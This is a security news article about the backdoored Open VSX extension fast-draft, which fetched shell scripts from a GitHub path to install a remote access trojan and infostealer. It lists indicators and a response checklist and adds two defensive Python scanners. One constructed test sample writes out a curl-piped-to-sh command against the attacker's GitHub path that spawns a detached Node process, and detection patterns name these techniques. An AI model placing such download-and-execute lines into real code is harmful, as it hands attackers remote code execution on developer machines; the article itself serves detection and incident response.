Backdoored Open VSX extension used GitHub-hosted downloader to install RAT and stealer


A compromised Open VSX extension called fast-draft quietly delivered a remote access trojan and an infostealer to developer machines by downloading second-stage payloads from GitHub. Security firm Aikido says several fast-draft releases under the KhangNghiem publisher account contained malicious code, while other nearby versions appeared clean, which points to a likely account or release pipeline compromise rather than an obviously rogue project.

The affected releases identified by Aikido were 0.10.89, 0.10.105, 0.10.106, and 0.10.112. As of March 17, 2026, Aikido said the Open VSX API listed 0.10.135 as the latest version and showed 26,594 total downloads for the extension, which gives the campaign a meaningful potential reach across developer systems.

According to Aikido, the malicious versions contacted a GitHub repository tied to BlokTrooper and piped platform-specific shell scripts straight into the system shell. Those scripts then fetched and ran a larger second-stage package that deployed multiple attack modules at once.

The wider concern goes beyond one extension. Open VSX is the Eclipse Foundation-backed alternative to the Visual Studio Marketplace, and editor extensions often run with broad access to local files, developer secrets, terminals, and network resources. That makes extension ecosystems a high-value target for supply chain attacks.

What happened

Aikido said it found the compromise during a manual version-by-version review of the fast-draft release line. The company disclosed the issue to the maintainer on March 12, 2026 through GitHub issue #565, but said the report had received no response at the time the research was published.

The release pattern looked unusual. Aikido reported that versions 0.10.88, 0.10.111, and 0.10.135 did not show the same malicious behavior, while the four flagged versions did. That alternating pattern suggests intermittent access to the publisher account or release token, not a simple one-time swap of the whole project. This is Aikido’s assessment, not a confirmed attribution from Open VSX or the maintainer.

How the malware chain worked

Aikido says the malicious extension reached out to raw.githubusercontent.com/BlokTrooper/extension to fetch platform-specific scripts. Instead of storing the full payload inside the extension package, the attacker used GitHub as a delivery point for the next stage, which can make suspicious behavior harder to spot during casual review.

Once the downloader ran, it pulled a ZIP archive, unpacked it into a temporary directory, and launched four detached Node.js processes. Aikido says those processes split the workload across separate modules for remote control, browser and wallet theft, file collection, and clipboard surveillance.

One module reportedly connected to command-and-control infrastructure at 195.201.104.53 over port 6931 using Socket.IO, which gave the operator live access to the system. Aikido says that capability included mouse and keyboard control, screenshots, and clipboard reads.

A second module targeted browser profiles across Chrome, Edge, Brave, and Opera on Windows, macOS, and Linux. Aikido says it also targeted 25 cryptocurrency wallet extensions, including MetaMask, Phantom, Coinbase Wallet, and Trust Wallet, then sent the collected data to port 6936 on the same server.

A third module searched the home directory for documents, environment files, private keys, shell history, and source code. Aikido says it deliberately skipped folders such as .cursor, .claude, and .windsurf, which suggests the operator made choices about where to search and what to avoid on AI-assisted developer machines.

The fourth module watched the clipboard and exfiltrated captured content, which could include passwords, API keys, and seed phrases. Aikido linked that traffic to /api/service/makelog on the command-and-control server.
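The version-by-version review Aikido describes can be partly automated for the indicators this article reports. The following is an added example written for this page, not code from Aikido or from the fast-draft project: it scans an extension's JavaScript for the reported stage-two path and for generic download-and-execute idioms (remote fetch piped into a shell, `child_process` use, detached children, extraction into a temp directory). Only the `raw.githubusercontent.com/BlokTrooper` string comes from the page; the other patterns and the score threshold are assumptions, and both sample sources below are constructed for the demonstration.

```python
import re

# Review patterns. Only the BlokTrooper path is from the published analysis;
# the rest are generic download-and-execute idioms (an assumption about what
# a reviewer should look for, not a description of the real extension's code).
REVIEW_PATTERNS = [
    ("reported stage-2 host",
     re.compile(r"raw\.githubusercontent\.com/BlokTrooper", re.I)),
    ("remote fetch piped into a shell",
     re.compile(r"\b(curl|wget)\b[^\n|]*\|\s*(ba)?sh\b")),
    ("shell execution from the extension",
     re.compile(r"child_process|\b(exec|execSync|spawn|spawnSync)\s*\(")),
    ("detached child process",
     re.compile(r"detached\s*:\s*true")),
    ("unref() on a child (fire and forget)",
     re.compile(r"\.unref\s*\(")),
    ("archive extraction into a temp dir",
     re.compile(r"(os\.tmpdir|tmpdir)\s*\(|\bunzip\b|AdmZip|extract", re.I)),
]


def review_source(name, text):
    """Return [(file, line_number, label)] for every pattern hit, in file order."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for label, pattern in REVIEW_PATTERNS:
            if pattern.search(line):
                findings.append((name, lineno, label))
    return findings


def risk_score(findings):
    """Number of distinct categories hit. Treating 3 or more as 'inspect by
    hand before installing' is an assumed threshold, not a published one."""
    return len({label for _, _, label in findings})


# Constructed sample: a harmless extension entry point.
BENIGN_SOURCE = """\
const vscode = require("vscode");
function activate(context) {
  const cmd = vscode.commands.registerCommand("fastDraft.hello", () => {
    vscode.window.showInformationMessage("Hello from a draft");
  });
  context.subscriptions.push(cmd);
}
module.exports = { activate };
"""

# Constructed sample shaped like the chain the article describes (fetch a
# script from the reported GitHub path, run it, launch a detached Node
# process from a temp dir). It is illustrative test input, not the real code.
SUSPICIOUS_SOURCE = """\
const { exec, spawn } = require("child_process");
const os = require("os");
const url = "https://raw.githubusercontent.com/BlokTrooper/extension/main/setup.sh";
exec(`curl -fsSL ${url} | sh`);
const child = spawn("node", [os.tmpdir() + "/stage2/index.js"], { detached: true, stdio: "ignore" });
child.unref();
"""


if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SOURCE), ("suspect", SUSPICIOUS_SOURCE)):
        hits = review_source(label, src)
        print(f"{label}: score {risk_score(hits)}")
        for _, lineno, reason in hits:
            print(f"  line {lineno}: {reason}")
```

Run it against each unpacked release in turn (the `extension.js` or bundled `dist/` files inside the `.vsix`), diffing the finding lists between adjacent versions; a release whose score jumps while its neighbours stay flat is exactly the alternating pattern the analysis reports.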

Malicious and clean versions

Version     Status reported by Aikido
0.10.88     Clean
0.10.89     Malicious
0.10.105    Malicious
0.10.106    Malicious
0.10.111    Clean
0.10.112    Malicious
0.10.135    Clean at time of review

Source: Aikido’s published analysis of the fast-draft extension.

Why developers should care

A malicious editor extension can reach far beyond one app. On many developer systems, a compromised extension can access local source code, browser sessions, terminal history, cloud credentials, wallet data, and clipboard contents. In practice, that means one backdoored add-on can become a route to code theft, financial loss, account takeover, and follow-on attacks inside a company. This risk model follows directly from Aikido’s technical findings on what the second stage tried to collect.

The case also shows why version-level review matters. A clean latest version does not always mean the extension was safe last week. Aikido’s findings suggest users who installed the wrong release during the malicious window may still need incident response even if the current listing no longer shows obvious malicious behavior.

What affected users should do now

Developers should check whether they ever installed fast-draft versions 0.10.89, 0.10.105, 0.10.106, or 0.10.112. Aikido recommends immediate removal and says any system that ran those builds should be treated as potentially compromised.

Teams should also rotate stored credentials, API keys, browser-saved passwords, and cryptocurrency wallet secrets that may have been present on affected machines. Network defenders should block or investigate traffic to 195.201.104.53 on ports 6931, 6936, and 6939, and review logs for requests to raw.githubusercontent.com/BlokTrooper.

Immediate response checklist

  • Check installed or previously installed fast-draft versions against the known malicious list.
  • Remove the extension from affected environments.
  • Reimage or deeply investigate systems that executed the malicious versions. This is a security best-practice inference based on the reported RAT and stealer behavior.
  • Rotate passwords, tokens, SSH keys, API keys, and wallet-related secrets.
  • Hunt for traffic to the reported GitHub path and C2 IP and ports.
  • Review source code repositories and developer accounts for signs of follow-on access. This is a reasonable defensive step based on the categories of data Aikido says were targeted.
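The version check and the traffic hunt from the checklist above, as an added example written for this page rather than code from Aikido or the fast-draft project. It assumes installed extensions sit in a directory of `<folder>/package.json` manifests (the layout VS Code-style editors use; pass your own root) and that network logs are free-form text lines; the manifests and log lines embedded below are constructed. Versions are matched exactly against Aikido's list, so any fast-draft release the analysis did not name is reported as "unassessed" rather than "clean".

```python
import json
import re
from pathlib import Path

# Indicators from the published analysis (values as stated on the page).
PUBLISHER = "khangnghiem"
EXTENSION = "fast-draft"
MALICIOUS_VERSIONS = {"0.10.89", "0.10.105", "0.10.106", "0.10.112"}
CLEAN_REVIEWED = {"0.10.88", "0.10.111", "0.10.135"}
C2_IP = "195.201.104.53"
C2_PORTS = {6931, 6936, 6939}
GITHUB_PATH = "raw.githubusercontent.com/BlokTrooper"


def classify_version(publisher, name, version):
    """Exact-match classification. Unlisted fast-draft versions are
    'unassessed', never 'clean': the analysis did not review them."""
    if publisher.lower() != PUBLISHER or name.lower() != EXTENSION:
        return "other-extension"
    if version in MALICIOUS_VERSIONS:
        return "malicious"
    if version in CLEAN_REVIEWED:
        return "clean-per-review"
    return "unassessed"


def scan_manifests(manifests):
    """Take parsed package.json dicts, return [(publisher, name, version, status)]
    for every fast-draft install found."""
    hits = []
    for meta in manifests:
        pub = meta.get("publisher", "")
        name = meta.get("name", "")
        ver = meta.get("version", "")
        status = classify_version(pub, name, ver)
        if status != "other-extension":
            hits.append((pub, name, ver, status))
    return hits


def scan_extension_dir(root):
    """Read <root>/*/package.json (assumed layout) and classify each one."""
    manifests = []
    for manifest in Path(root).glob("*/package.json"):
        try:
            manifests.append(json.loads(manifest.read_text(encoding="utf-8")))
        except (OSError, ValueError):
            continue  # unreadable or malformed manifest: skip, do not crash the triage
    return scan_manifests(manifests)


_IP_RE = re.compile(r"(?<!\d)" + re.escape(C2_IP) + r"(?!\d)")
_NUM_RE = re.compile(r"(?<!\d)(\d{1,5})(?!\d)")


def hunt_logs(lines):
    """Flag lines that reference the reported C2 address or GitHub path.
    Format-agnostic: the IP must appear as a whole token, and a port counts
    only if one of the reported ports appears as a standalone number on the
    same line. Returns [(line_number, reason)]."""
    findings = []
    for n, line in enumerate(lines, 1):
        if GITHUB_PATH.lower() in line.lower():
            findings.append((n, "stage-2 download path"))
            continue
        if _IP_RE.search(line):
            ports = {int(p) for p in _NUM_RE.findall(line)} & C2_PORTS
            if ports:
                findings.append((n, f"C2 IP, port {sorted(ports)[0]}"))
            else:
                findings.append((n, "C2 IP (port not in reported set)"))
    return findings


# Constructed sample manifests and log lines for the demonstration.
SAMPLE_MANIFESTS = [
    {"publisher": "KhangNghiem", "name": "fast-draft", "version": "0.10.105"},
    {"publisher": "KhangNghiem", "name": "fast-draft", "version": "0.10.111"},
    {"publisher": "someone-else", "name": "fast-draft", "version": "0.10.105"},
]
SAMPLE_LOGS = [
    "2026-03-13T09:41:02Z proxy GET https://raw.githubusercontent.com/BlokTrooper/extension/main/install.sh 200",
    "2026-03-13T09:41:05Z fw ACCEPT src=10.0.0.12:51322 dst=195.201.104.53:6931 proto=tcp",
    "2026-03-13T09:41:09Z fw ACCEPT src=10.0.0.12:51330 dst=195.201.104.53:6936 proto=tcp",
    "2026-03-13T09:42:00Z proxy GET https://registry.npmjs.org/-/ping 200",
    "2026-03-13T09:43:11Z fw ACCEPT src=10.0.0.12:51340 dst=195.201.104.53:443 proto=tcp",
]


if __name__ == "__main__":
    for pub, name, ver, status in scan_manifests(SAMPLE_MANIFESTS):
        print(f"{pub}.{name}@{ver}: {status}")
    for n, reason in hunt_logs(SAMPLE_LOGS):
        print(f"log line {n}: {reason}")
```

A line carrying the C2 address on a port outside the reported set is still surfaced, but labelled separately, because the report only names three ports and a defender would rather see the hit and decide than have the filter drop it.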

FAQ

What is Open VSX?

Open VSX is an open-source extension registry operated as an Eclipse Foundation project and serves as an alternative marketplace for compatible code editors.

Which fast-draft versions were malicious?

Aikido identified 0.10.89, 0.10.105, 0.10.106, and 0.10.112 as malicious.

Was every version of fast-draft infected?

No. Aikido says some nearby releases, including 0.10.88, 0.10.111, and 0.10.135, did not show the malicious behavior seen in the compromised versions.

What did the malware try to steal?

According to Aikido, the second stage included a RAT, a browser and crypto-wallet stealer, a file exfiltration module, and a clipboard monitor.

Why did the malware use GitHub?

Aikido says the extension downloaded scripts and payloads from a GitHub-hosted repository controlled by the attacker. Using GitHub can help malicious traffic blend in with normal developer activity. The download source is Aikido's finding; the point about blending in is this article's inference.
